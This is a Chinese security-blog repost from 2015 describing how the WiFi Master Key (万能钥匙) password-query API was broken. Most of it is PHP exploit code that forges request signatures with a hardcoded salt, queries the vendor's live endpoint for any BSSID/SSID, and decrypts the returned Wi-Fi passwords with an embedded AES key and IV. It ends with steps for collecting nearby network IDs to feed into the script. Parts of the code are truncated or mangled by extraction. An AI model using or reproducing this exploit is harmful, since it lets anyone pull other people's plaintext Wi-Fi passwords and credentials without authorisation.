WIFI万能钥匙密码查询接口
(window.slotbydup=window.slotbydup || []).push({
id: '2611110',
container: s,
size: '240,200',
display: 'inlay-fix'
您当前位置： &
[ 所属分类
| 时间 2015 |
作者 红领巾 ]
拜读了《WIFI万能钥匙密码查询接口算法破解（可无限查询用户AP明文密码）》http://www.wooyun.org/bugs/wooyun-一文
通过程序包分析算法（说一下在，各种key，salt明文存储，连混淆哪怕是字符拼接都没有。。。）
这个是查询密码用到的数据包，以及参数中sign（签名）的算法，其实就是这些数据进行排序后用salt算个md5。新版本的万能钥匙还有个retSn，实现链式认证，也能突破，但这个报告只说1.x版本的API问题（1.x时代很多细节明显没有考虑完善，基本只靠sign做安全）
//some code from http://www.wooyun.org/bugs/wooyun-
$bssid = "c8:3a:35:fa:b8:80";
$ssid = "Podinns2F03";
if(isset($bssid) && isset($ssid)){
//update salt
$ret = request($bssid, $ssid, md5(rand(1, 10000)));
$ret = json_decode($ret);
$ret = request($bssid, $ssid, $ret-&retSn);
$ret = json_decode($ret);
if($ret-&retCd == 0){
if($ret-&qryapwd-&retCd == 0){
$list = $ret-&qryapwd-&
foreach($list as $wifi){
echo 'SSID: '.$wifi-&ssid."\n";
echo 'PWD: '.decryptStrin($wifi-&pwd)."\n";
echo 'BSSID: '.$wifi-&bssid."\n";
if($wifi-&xUser){
echo 'xUser: '.$wifi-&xUser."\n";
echo 'xPwd: '.$wifi-&xPwd."\n";
echo $ret-&qryapwd-&retM
function request($bssid, $ssid, $salt, $dhid = 'ff98a014ccbbdfa375369'){
$data = array();
$data['appid'] = '0008';
$data['bssid'] = $
$data['chanid'] = 'gw';
$data['dhid'] = $
$data['ii'] = 'fc6cfb4bf7ac9';
$data['lang'] = 'cn';
$data['mac'] = '60f81dad28de';
$data['method'] = 'getDeepSecChkSwitch';
$data['pid'] = 'qryapwd:commonswitch';
$data['ssid'] = $
$data['st'] = 'm';
$data['uhid'] = 'a0000001';
$data['v'] = '324';
$data['sign'] = sign($data, $salt);
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd');
curl_setopt($curl, CURLOPT_USERAGENT,'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true); // enable posting
curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($data)); // post images
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload
$r = curl_exec($curl);
curl_close($curl);
return $r;
function registerNewDevice(){
$salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3Nj#1Aa$';
$data = array();
$data['appid'] = '0008';
$data['bssid'] = $
$data['chanid'] = 'gw';
$data['dhid'] = $
$data['ii'] = 'fc6cfb4bf7ac9';
$data['lang'] = 'cn';
$data['mac'] = '60f81dad28de';
$data['method'] = 'getDeepSecChkSwitch';
$data['pid'] = 'qryapwd:commonswitch';
$data['ssid'] = $
$data['st'] = 'm';
$data['uhid'] = 'a0000001';
$data['v'] = '324';
$data['sign'] = sign($data, $salt);
function sign( $array , $salt ){
// 签名算法
$request_str = '';
// 对应apk中的 Arrays.sort 数组排序，测试PHP需用 ksort
ksort( $array );
foreach ($array as $key =& $value) {
$request_str .= $
$sign = md5( $request_str . $salt );
return strtoupper($sign);
function decryptStrin($str,$keys='k%7Ve#8Ie!5Fb&8E',$iv='y!0Oe#2Wj#6Pw!3V',$cipher_alg=MCRYPT_RIJNDAEL_128){
//Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密
//[length][password][timestamp]
$decrypted_string = mcrypt_decrypt($cipher_alg, $keys, pack("H*",$str),MCRYPT_MODE_CBC, $iv);
return substr(trim($decrypted_string),3,-13);
说明：如何查看附近的WIFI
powershell或者cmd执行netsh wlan show network mode=bssid,将结果粘贴进去
执行airport -s,将结果粘贴进去
如果提示没有airport，先执行
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
我们qu查询huipu那个~
标签：none
本文开发（php）相关术语:php代码审计工具 php开发工程师 移动开发者大会 移动互联网开发 web开发工程师 软件开发流程 软件开发工程师
转载请注明本文标题：本站链接：
分享请点击：
1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责；
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性，不作出任何保证或承若；
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
CodeSecTeam微信公众号
你寻求的幸福，其实不在远处，它就是你现在，一直走的路。
手机客户端
，专注代码审计及安全周边编程，转载请注明出处：http://www.codesec.net
转载文章如有侵权，请邮件 admin[at]codesec.net}